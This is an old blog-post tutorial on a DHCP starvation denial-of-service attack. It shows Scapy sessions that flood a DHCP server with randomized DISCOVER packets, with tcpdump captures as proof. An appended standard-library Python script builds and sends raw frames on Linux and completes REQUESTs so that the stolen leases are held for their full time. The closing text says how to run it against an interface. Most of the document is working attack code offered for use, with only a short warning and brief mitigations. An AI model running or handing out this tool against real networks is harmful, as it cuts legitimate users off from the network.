====== DHCP DoS with scapy ======

  * http://funoverip.net/2010/12/dhcp-denial-of-service-with-scapy/
  * http://hakipedia.com/index.php/Category:Network_Security

DHCP Denial of Service with scapy, by foip on December 9th, 2010

===== 1. Introduction =====

This is a small post explaining how to run a starvation attack against a DHCP server with only three lines of code (thanks to Scapy!).

Information and download regarding Scapy: http://www.secdev.org/projects/scapy/

Information about the DHCP starvation attack: http://hakipedia.com/index.php/DHCP_Starvation

===== 2. Starvation attack with scapy =====

Running a starvation attack is nothing more than sending a lot of dummy DHCP requests, each with a random source MAC address and a random client hardware address (the BOOTP chaddr field, which is what the server binds the lease to). After a few seconds there are no more IP addresses available in the pool, and legitimate clients can no longer obtain a lease.

Warning: don't run this attack against networks you are not authorized to test!

The session below is a variant for testing against a single host: note the newer Scapy version, and that the dst of the IP layer is the server's unicast address instead of the broadcast address. With loop=0, sendp() sends the frame once.

<code>
[root@localhost scapy-2.1.0]# ./run_scapy
INFO: Can't import python gnuplot wrapper . Won't be able to plot.
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().
WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.1.0)
>>> conf.checkIPaddr = False
>>> dhcp_request = Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="10.0.8.174")/UDP(sport=68,dport=67)/BOOTP(chaddr=RandString(12,'0123456789abcdef'))/DHCP(options=[("message-type","discover"),"end"])
>>> sendp(dhcp_request,loop=0)
</code>

This is the attack itself. With loop=1, sendp() keeps sending until interrupted, and because RandMAC() and RandString() are volatile fields, Scapy draws new random values each time it builds the frame, so every DISCOVER on the wire comes from a different MAC and client hardware address. The conf.checkIPaddr = False line only matters when Scapy has to match DHCP replies to requests (srp()), since the replies come from the server's address rather than the broadcast address the request was sent to; for sendp() it does no harm.

<code>
[root@host1 ]$ scapy
Welcome to Scapy (v1.1.1 / -)
>>> conf.checkIPaddr = False
>>> dhcp_discover = Ether(src=RandMAC(),dst="ff:ff:ff:ff:ff:ff")/IP(src="0.0.0.0",dst="255.255.255.255")/UDP(sport=68,dport=67)/BOOTP(chaddr=RandString(12,'0123456789abcdef'))/DHCP(options=[("message-type","discover"),"end"])
>>> sendp(dhcp_discover,loop=1)
...............................................................^C
Sent 70 packets.
</code>
To stop the attack, simply press Ctrl+C.

Does it work? Yes, take a look at the following tcpdump captures. The filter port 68 catches both directions, since the client port is the source port of the requests and the destination port of the replies.

==== 2.1. The DHCP queries: ====

<code>
[root@host2 ]$ tcpdump -n -e -i eth0 port 68
ec:51:e2:20:5b:93 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 64:38:62:38:63:65, length 244
8e:97:0f:18:8a:19 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 39:33:39:37:65:66, length 244
28:a7:45:35:c0:47 > ff:ff:ff:ff:ff:ff, ethertype IPv4 (0x0800), length 286: 0.0.0.0.68 > 255.255.255.255.67: BOOTP/DHCP, Request from 38:34:66:64:33:63, length 244
...
</code>

Each request has a different Ethernet source address (the RandMAC()). The "Request from" address printed by tcpdump is the BOOTP chaddr, which is a second, independent random value: RandString(12,'0123456789abcdef') fills it with ASCII hex digits, which is why every client hardware address consists only of the bytes 0x30-0x39 and 0x61-0x66 (64:38:62:38:63:65 is the string "d8b8ce"). The server binds the lease to chaddr, not to the frame's source MAC. The 244-byte payload is the 236-byte BOOTP header plus 8 bytes of options: the 4-byte magic cookie, the 3-byte message-type option and the end marker.

==== 2.2. Then the DHCP responses: ====

<code>
00:23:20:56:53:f0 > 64:38:62:38:63:65, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.117.68: BOOTP/DHCP, Reply, length 305
00:23:20:56:53:f0 > 39:33:39:37:65:66, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.118.68: BOOTP/DHCP, Reply, length 305
00:23:20:56:53:f0 > 38:34:66:64:33:63, ethertype IPv4 (0x0800), length 347: 192.168.0.1.67 > 192.168.0.119.68: BOOTP/DHCP, Reply, length 305
...
</code>

The server (00:23:20:56:53:f0, 192.168.0.1) answers each DISCOVER with an OFFER, unicast to the chaddr of the request and to the offered address (192.168.0.117, .118, .119, ...), taking a fresh address out of the pool every time. Two practical caveats: a DISCOVER alone only produces an OFFER, and RFC 2131 lets a server reserve an offered address only until a REQUEST arrives (or not at all), so against a server that reclaims unrequested offers quickly the handshake has to be completed for each address to hold the pool for the full lease time. On switched networks, DHCP snooping with a rate limit on untrusted ports, or port security capping the number of MAC addresses per port, stops this attack at the access layer.

===== 3. The End =====

Hope you enjoy.
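The following is an added example, not the original post's Scapy code. It builds the same DISCOVER frame as section 2 by hand with the Python standard library (struct and socket only), so the 286-byte layout seen in the tcpdump capture of section 2.1 can be checked offline, and it goes one step beyond the post by parsing an OFFER and building the matching REQUEST, which is what holds an address for the full lease time. All function names (build_dhcp, build_frame, discover, parse_dhcp, fake_offer, request_for, send_discovers), the MACs and the addresses are my own constructions; fake_offer is a constructed stand-in for a real server reply, and send_discovers assumes a Linux AF_PACKET raw socket and root.

```python
"""Hand-built DHCP starvation frames (Ethernet/IPv4/UDP/BOOTP/DHCP).
Added example, not the original post's Scapy code; standard library only.
All MACs and addresses below are constructed; sending needs Linux and root."""
import os
import random
import socket
import struct

BROADCAST_MAC = b"\xff" * 6
DHCP_MAGIC = b"\x63\x82\x53\x63"          # RFC 2132 magic cookie
DISCOVER, OFFER, REQUEST = 1, 2, 3         # option 53 message types


def random_mac():
    """Random locally administered unicast MAC (bit 1 set, multicast bit clear)."""
    first = (random.randrange(256) | 0x02) & 0xFE
    return bytes([first]) + os.urandom(5)


def ip_checksum(hdr):
    """RFC 1071 one's-complement checksum; returns 0 for a header that verifies."""
    if len(hdr) % 2:
        hdr += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(hdr) // 2), hdr))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_dhcp(msg_type, mac, xid, options=(), op=1, yiaddr=b"\0" * 4):
    """236-byte BOOTP header plus DHCP options.  chaddr equals the Ethernet
    source MAC so a unicast reply reaches the sender (the post's RandString
    chaddr did not match its RandMAC); flags=0x8000 asks for a broadcast reply."""
    bootp = struct.pack("!BBBBIHH4s4s4s4s16s64s128s",
                        op, 1, 6, 0,                  # op, htype=Ethernet, hlen=6, hops
                        xid, 0, 0x8000,               # xid, secs, flags
                        b"\0" * 4, yiaddr, b"\0" * 4, b"\0" * 4,  # ciaddr yiaddr siaddr giaddr
                        mac.ljust(16, b"\0"), b"\0" * 64, b"\0" * 128)  # chaddr sname file
    opts = DHCP_MAGIC + bytes([53, 1, msg_type])
    for code, value in options:
        opts += bytes([code, len(value)]) + value
    return bootp + opts + b"\xff"                      # option 255 = end


def build_frame(src_mac, dst_mac, src_ip, dst_ip, payload, sport=68, dport=67):
    """Wrap a BOOTP/DHCP payload in UDP, IPv4 and Ethernet (UDP checksum left 0)."""
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(udp), 0, 0, 64, 17, 0,
                     socket.inet_aton(src_ip), socket.inet_aton(dst_ip))
    ip = ip[:10] + struct.pack("!H", ip_checksum(ip)) + ip[12:]
    return dst_mac + src_mac + b"\x08\x00" + ip + udp


def discover(mac=None, xid=None):
    """One DISCOVER frame from a fresh random MAC, like the post's dhcp_discover."""
    mac = mac or random_mac()
    xid = random.getrandbits(32) if xid is None else xid
    return build_frame(mac, BROADCAST_MAC, "0.0.0.0", "255.255.255.255",
                       build_dhcp(DISCOVER, mac, xid))


def parse_dhcp(frame):
    """Extract xid, chaddr, yiaddr and options from a raw IPv4/UDP DHCP frame."""
    ihl = (frame[14] & 0x0F) * 4
    bootp = frame[14 + ihl + 8:]
    opts, i = {}, 240                                  # options follow the magic cookie
    while i < len(bootp) and bootp[i] != 0xFF:
        if bootp[i] == 0:                              # pad option
            i += 1
            continue
        code, length = bootp[i], bootp[i + 1]
        opts[code] = bootp[i + 2:i + 2 + length]
        i += 2 + length
    return {"xid": struct.unpack("!I", bootp[4:8])[0], "chaddr": bootp[28:34],
            "yiaddr": socket.inet_ntoa(bootp[16:20]), "options": opts}


def fake_offer(discover_frame, yiaddr, server_ip, server_mac=b"\x02\0\0\0\0\x01"):
    """Constructed stand-in for the server's OFFER, for offline testing only."""
    d = parse_dhcp(discover_frame)
    payload = build_dhcp(OFFER, d["chaddr"], d["xid"], [(54, socket.inet_aton(server_ip))],
                         op=2, yiaddr=socket.inet_aton(yiaddr))
    return build_frame(server_mac, d["chaddr"], server_ip, yiaddr, payload, 67, 68)


def request_for(offer_frame):
    """REQUEST that turns an OFFER into a lease held for the full lease time:
    option 50 = requested address, option 54 = server identifier, same MAC and xid."""
    o = parse_dhcp(offer_frame)
    opts = [(50, socket.inet_aton(o["yiaddr"])), (54, o["options"][54])]
    return build_frame(o["chaddr"], BROADCAST_MAC, "0.0.0.0", "255.255.255.255",
                       build_dhcp(REQUEST, o["chaddr"], o["xid"], opts))


def send_discovers(iface, count):
    """Linux only, needs root: push count DISCOVERs out of iface via AF_PACKET."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        for _ in range(count):
            s.send(discover())
    return count
```

A DISCOVER built by discover() is exactly 286 bytes on the wire, matching the length tcpdump reported in section 2.1. To reproduce the post's attack, call send_discovers("eth0", 200) as root on Linux; to hold addresses for the whole lease time, sniff the OFFERs (they are broadcast because of the flags bit) and answer each one with request_for().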